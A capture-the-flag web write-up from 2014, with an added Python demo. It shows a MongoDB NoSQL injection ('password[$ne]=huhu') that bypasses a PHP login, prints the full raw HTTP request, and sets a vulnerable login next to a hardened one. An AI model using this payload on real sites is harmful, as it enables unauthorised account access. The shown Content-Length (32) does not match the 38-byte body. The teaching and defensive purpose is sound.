Monday, May 12, 2014

Hacktrick 2014 - ORION - Web Write-up

In this challenge we had to log in as admin on a page that let us register an account and log in with it. First we looked for a guessable session ID, but there was none :(. Then we tried setting cookies such as admin and isadmin; that did not work either. Then we got a hint that the server was using MongoDB, and after that everything was easy: a single NoSQL injection request made us admin. The username we confirmed through the registration form (which reveals whether a name is already taken). The trick is that PHP parses a form field named password[$ne] into an array, so the login filter handed to MongoDB becomes {login: "admin", password: {$ne: "huhu"}}, which matches the admin document as long as its real password is not "huhu". The raw request we sent with netcat was:

POST /index.php HTTP/1.1
Host: 80.251.47.26
Connection: keep-alive
Content-Length: 32
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://80.251.47.26
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.132 Safari/537.36
Content-Type: application/x-www-form-urlencoded
DNT: 1
Referer: http://80.251.47.26/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: admin=true; isadmin=true; PHPSESSID=123

login=admin&password[$ne]=huhu&submit=

After that we just refreshed the page and were logged in as admin :) When replaying a request like this with netcat, keep Content-Length equal to the number of bytes in the body you actually send; the server reads exactly that many bytes and will otherwise either truncate the form or wait for more data.
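To make the mechanism concrete, here is an added example (not code from the original write-up or from the challenge) that reproduces the bug in miniature: it decodes a urlencoded body the way PHP builds $_POST, builds the MongoDB-style filter that a naive login would send, and evaluates it against a constructed in-memory user list with a tiny matcher that understands equality and $ne. The user records, the matcher, and the function names vulnerable_login/hardened_login are all assumptions made for this demonstration; the hardened version shows the usual fix of refusing any non-string value before it reaches the query.

```python
"""
Added example (not from the original write-up): why `password[$ne]=huhu`
logs you in as admin when PHP form values are passed straight into a
MongoDB filter. Everything here (users, matcher, function names) is a
constructed stand-in for the challenge's code, not the real thing.
"""
import re
from urllib.parse import parse_qsl

# Constructed sample "collection"; the real admin password is unknown to the attacker.
USERS = [
    {"login": "admin", "password": "S3cretAdminPw"},
    {"login": "alice", "password": "wonderland"},
]

_KEY_RE = re.compile(r"^([^\[]+)((?:\[[^\]]*\])*)$")


def php_parse_body(body: str) -> dict:
    """Decode a urlencoded body the way PHP populates $_POST:
    'a=1' -> {'a': '1'}, 'a[b]=1' -> {'a': {'b': '1'}}.
    (PHP's append syntax 'a[]=1' is not modelled; it is not needed here.)"""
    out = {}
    for key, value in parse_qsl(body, keep_blank_values=True):
        m = _KEY_RE.match(key)
        if not m:
            continue
        base = m.group(1)
        brackets = re.findall(r"\[([^\]]*)\]", m.group(2))
        if not brackets:
            out[base] = value
            continue
        if not isinstance(out.get(base), dict):
            out[base] = {}  # PHP overwrites a scalar when bracket keys appear
        node = out[base]
        for sub in brackets[:-1]:
            node = node.setdefault(sub, {})
        node[brackets[-1]] = value
    return out


def _matches(doc_value, cond) -> bool:
    """Minimal subset of MongoDB matching: equality or a {'$ne': x} operator."""
    if isinstance(cond, dict):
        if set(cond) == {"$ne"}:
            return doc_value != cond["$ne"]
        raise ValueError("unsupported operator(s): %s" % sorted(cond))
    return doc_value == cond


def find_one(collection, query):
    """Return the first document where every field satisfies the query."""
    for doc in collection:
        if all(_matches(doc.get(k), v) for k, v in query.items()):
            return doc
    return None


def vulnerable_login(body: str):
    """Mirrors the bug: POST values go into the filter untyped, so an array
    such as {'$ne': 'huhu'} becomes a query operator."""
    form = php_parse_body(body)
    query = {"login": form.get("login"), "password": form.get("password")}
    return find_one(USERS, query)


def hardened_login(body: str):
    """Fix: accept only scalar strings, so an operator object can never
    reach the filter. (A real app would also compare password hashes.)"""
    form = php_parse_body(body)
    login, password = form.get("login"), form.get("password")
    if not isinstance(login, str) or not isinstance(password, str):
        return None
    return find_one(USERS, {"login": login, "password": password})


# The body from the write-up's request.
PAYLOAD = "login=admin&password[$ne]=huhu&submit="

if __name__ == "__main__":
    print(php_parse_body(PAYLOAD))
    print("vulnerable:", vulnerable_login(PAYLOAD))
    print("hardened:  ", hardened_login(PAYLOAD))
```

Running it shows the parsed body as {'login': 'admin', 'password': {'$ne': 'huhu'}, 'submit': ''}; the vulnerable path returns the admin document without knowing the password, while the hardened path returns nothing for the same body and still works for a correct plain password.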
